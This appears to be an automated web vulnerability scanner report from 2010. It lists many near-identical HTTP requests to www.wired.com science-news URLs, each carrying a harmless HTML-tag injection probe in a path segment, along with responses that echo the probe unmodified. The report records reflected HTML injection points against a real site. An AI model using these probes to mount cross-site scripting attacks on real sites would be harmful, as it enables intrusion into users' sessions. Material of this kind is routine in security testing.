GET /science58f65"><a>a1751845344/discoveries/news/2007/11/wiredscience HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:23 GMT Date: Sun, 21 Nov 2010 23:09:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science58f65"><a>a1751845344 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995c5"><a>fe13073f8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries995c5"><a>fe13073f8eb/news/2007/11/wiredscience HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:40 GMT Date: Sun, 21 Nov 2010 23:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries995c5"><a>fe13073f8eb c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9994"><a>6e128528801 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newse9994"><a>6e128528801/2007/11/wiredscience HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:58 GMT Date: Sun, 21 Nov 2010 23:09:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newse9994"><a>6e128528801"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bd"><a>1e8eec37d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencebb7bd"><a>1e8eec37d12/discoveries/news/2007/12/dayintech_1217 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:07 GMT Date: Sun, 21 Nov 2010 23:11:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencebb7bd"><a>1e8eec37d12 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d62a"><a>5c65a610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries6d62a"><a>5c65a610/news/2007/12/dayintech_1217 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29315 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries6d62a"><a>5c65a610 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43dd8"><a>9084cb4edf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news43dd8"><a>9084cb4edf/2007/12/dayintech_1217 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:33 GMT Date: Sun, 21 Nov 2010 23:11:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news43dd8"><a>9084cb4edf"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266e8"><a>afe4e6938d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science266e8"><a>afe4e6938d/discoveries/news/2008/02/dayintech_0226 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:08 GMT Date: Sun, 21 Nov 2010 23:12:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science266e8"><a>afe4e6938d ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1030"><a>70ba086e197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesb1030"><a>70ba086e197/news/2008/02/dayintech_0226 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:25 GMT Date: Sun, 21 Nov 2010 23:12:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesb1030"><a>70ba086e197 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news59c5e"><a>b29ca90e37a/2008/02/dayintech_0226 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:37 GMT Date: Sun, 21 Nov 2010 23:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news59c5e"><a>b29ca90e37a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cda9"><a>f470b0d8cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science4cda9"><a>f470b0d8cd7/discoveries/news/2008/03/dayintech_0321 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:15 GMT Date: Sun, 21 Nov 2010 23:12:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science4cda9"><a>f470b0d8cd7 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5b1"><a>73c8031883a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesff5b1"><a>73c8031883a/news/2008/03/dayintech_0321 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:34 GMT Date: Sun, 21 Nov 2010 23:12:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesff5b1"><a>73c8031883a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c62"><a>a1fbb2dbf1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news69c62"><a>a1fbb2dbf1f/2008/03/dayintech_0321 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:45 GMT Date: Sun, 21 Nov 2010 23:12:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news69c62"><a>a1fbb2dbf1f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71a7"><a>db01b03a6b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencea71a7"><a>db01b03a6b2/discoveries/news/2008/05/dayintech_0505 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:22 GMT Date: Sun, 21 Nov 2010 23:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencea71a7"><a>db01b03a6b2 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e4ac"><a>5182a879937 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries5e4ac"><a>5182a879937/news/2008/05/dayintech_0505 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:37 GMT Date: Sun, 21 Nov 2010 23:11:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries5e4ac"><a>5182a879937 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05d8"><a>5b5e97a1820 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb05d8"><a>5b5e97a1820/2008/05/dayintech_0505 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:47 GMT Date: Sun, 21 Nov 2010 23:11:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb05d8"><a>5b5e97a1820"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10ff3"><a>453721659f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science10ff3"><a>453721659f6/discoveries/news/2008/05/dayintech_0507 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:27 GMT Date: Sun, 21 Nov 2010 23:11:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science10ff3"><a>453721659f6 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d1cb"><a>508326e35f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries4d1cb"><a>508326e35f3/news/2008/05/dayintech_0507 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:42 GMT Date: Sun, 21 Nov 2010 23:11:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries4d1cb"><a>508326e35f3 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc419"><a>7899aecd94e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newscc419"><a>7899aecd94e/2008/05/dayintech_0507 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:53 GMT Date: Sun, 21 Nov 2010 23:11:53 GMT Connection: close
